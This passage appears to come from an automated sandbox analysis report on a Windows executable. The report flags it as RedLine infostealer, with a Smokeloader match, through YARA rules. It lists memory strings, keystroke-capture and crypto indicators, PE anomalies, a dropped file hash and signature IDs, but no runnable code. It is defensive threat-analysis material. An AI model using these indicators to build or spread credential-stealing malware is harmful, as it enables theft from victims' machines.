Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002760000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002791000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002728000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id2Response(
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002760000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002791000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002728000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3LR
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002760000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002677000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.00000000027C2000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002791000.00000004.00000800.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275443952.0000000002728000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://tempuri.org/Entity/Id3Response(
Source: Amcache.hve.1.dr	String found in binary or memory: http://upx.sf.net
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.activestate.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.activestate.comHolger
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.baanboard.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.baanboard.comBrendon
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.develop.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.develop.comDeepak
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.lua.org
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.rftp.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.rftp.comJosiah
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.scintilla.org
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.scintilla.org/scite.rng
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.spaceblue.com
Source: SciTE.exe.1.dr	String found in binary or memory: http://www.spaceblue.comMathias
Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000003.2038029261.00000000006F5000.00000004.00000020.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275112639.0000000002313000.00000004.00000020.00020000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3277082749.0000000005370000.00000004.08000000.00040000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3275191673.00000000024A0000.00000004.08000000.00040000.00000000.sdmp, FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe, 00000000.00000002.3276574886.0000000003605000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.ip.sb/ip
Source: IoUNtL.exe, 00000001.00000003.2027416860.0000000000956000.00000004.00000020.00020000.00000000.sdmp, IoUNtL.exe, 00000001.00000002.2256774762.0000000000945000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.live.com5
Source: SciTE.exe.1.dr	String found in binary or memory: https://www.smartsharesystems.com/
Source: SciTE.exe.1.dr	String found in binary or memory: https://www.smartsharesystems.com/Morten

Installs a raw input device (often for capturing keystrokes)

Source: SciTE.exe.1.dr

Binary or memory string: _winapi_getrawinputdata _winapi_getrawinputdeviceinfo _winapi_getregiondata _winapi_getregisteredrawinputdevices \

memstr_290dccd1-9

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.3.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2110000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.610e50.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2353bbe.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2354aa6.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2354aa6.2.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.3.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.6f54f8.1.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0000.5.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2353bbe.3.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3605570.8.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.3.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.6f54f8.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3605570.8.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.raw.unpack, type: UNPACKEDPE	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000000.00000002.3271943549.0000000000400000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000000.00000003.2035728193.0000000002110000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000000.00000002.3273309685.000000000068E000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
Source: 00000000.00000002.3277082749.0000000005370000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen
Source: 00000000.00000002.3272849307.0000000000610000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY	Matched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
Source: 00000000.00000002.3275191673.00000000024A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY	Matched rule: Detects RedLine infostealer Author: ditekSHen

PE file contains section with special chars

Source: MyProg.exe.1.dr

Static PE information: section name: Y|uR

PE file has a writeable .text section

Source: IoUNtL.exe.0.dr

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Detected potential crypto function

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00408C60	0_2_00408C60
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_0040DC11	0_2_0040DC11
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00407C3F	0_2_00407C3F
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00418CCC	0_2_00418CCC
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00406CA0	0_2_00406CA0
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_004028B0	0_2_004028B0
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_0041A4BE	0_2_0041A4BE
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00418244	0_2_00418244
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00401650	0_2_00401650
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00402F20	0_2_00402F20
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_004193C4	0_2_004193C4
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00418788	0_2_00418788
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00402F89	0_2_00402F89
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00402B90	0_2_00402B90
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_004073A0	0_2_004073A0
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00617856	0_2_00617856
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_006118A0	0_2_006118A0
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00613170	0_2_00613170
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_006131D9	0_2_006131D9
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_006289D8	0_2_006289D8
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00612B00	0_2_00612B00
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00628494	0_2_00628494
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00612DE0	0_2_00612DE0
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_0061DE61	0_2_0061DE61
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00616EF0	0_2_00616EF0
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00618EB0	0_2_00618EB0
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00617E8F	0_2_00617E8F
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_0062A70E	0_2_0062A70E
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_00628F1C	0_2_00628F1C
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_006177C2	0_2_006177C2
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_021D1ED2	0_2_021D1ED2
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_021D1EE0	0_2_021D1EE0
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_05FDC559	0_2_05FDC559
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_05FDA1E0	0_2_05FDA1E0
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_05FDE230	0_2_05FDE230
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_05FDDCB7	0_2_05FDDCB7
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_05FDE562	0_2_05FDE562
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_05FD94A8	0_2_05FD94A8
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_05FDF390	0_2_05FDF390
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_06063478	0_2_06063478
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_0606F2E0	0_2_0606F2E0
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_0606FA30	0_2_0606FA30
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_06067920	0_2_06067920
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_060A1A68	0_2_060A1A68
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_060A7F80	0_2_060A7F80
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_060A2A09	0_2_060A2A09
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_060A2A18	0_2_060A2A18
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_060DC54C	0_2_060DC54C
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_060D90C8	0_2_060D90C8
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_060D7D87	0_2_060D7D87
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_060DC54C	0_2_060DC54C
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_060DC54C	0_2_060DC54C
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: 0_2_06102228	0_2_06102228
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Code function: 1_2_00F46076	1_2_00F46076
Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe	Code function: 1_2_00F46D00	1_2_00F46D00

Dropped file seen in connection with other malware

Source: Joe Sandbox View

Dropped File: C:\Users\user\AppData\Local\Temp\IoUNtL.exe 4485DF22C627FA0BB899D79AA6FF29BC5BE1DBC3CAA2B7A490809338D54B7794

Found potential string decryption / allocating functions

Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: String function: 0061E428 appears 44 times
Source: C:\Users\user\Desktop\FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Code function: String function: 0040E1D8 appears 44 times

One or more processes crash

Source: C:\Users\user\AppData\Local\Temp\IoUNtL.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2920 -s 1556

PE file contains executable resources (Code or Archives)

Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe	Static PE information: Resource name: RT_VERSION type: MIPSEB-LE MIPS-III ECOFF executable not stripped - version 0.79
Source: MyProg.exe.1.dr	Static PE information: Resource name: RT_VERSION type: MIPSEB-LE ECOFF executable not stripped - version 0.79

Sample file is different than original file name gathered from version info

Uses 32bit PE files

Source: FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe

Static PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, 32BIT_MACHINE

Yara signature match

Source: 0.3.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2110000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.610e50.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2353bbe.3.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0ee8.4.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2354aa6.2.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3606458.7.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2354aa6.2.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.3.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.6f54f8.1.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0000.5.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.24a0000.5.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.5370000.9.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.2353bbe.3.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.362f590.6.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.2.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.3605570.8.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
Source: 0.3.FE30749E0A05991421373D09B35D63F1E267C8B1DE97850E9AAB4433834049A6.exe.6f54f8.1.raw.unpack, type: UNPACKEDPE	Matched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
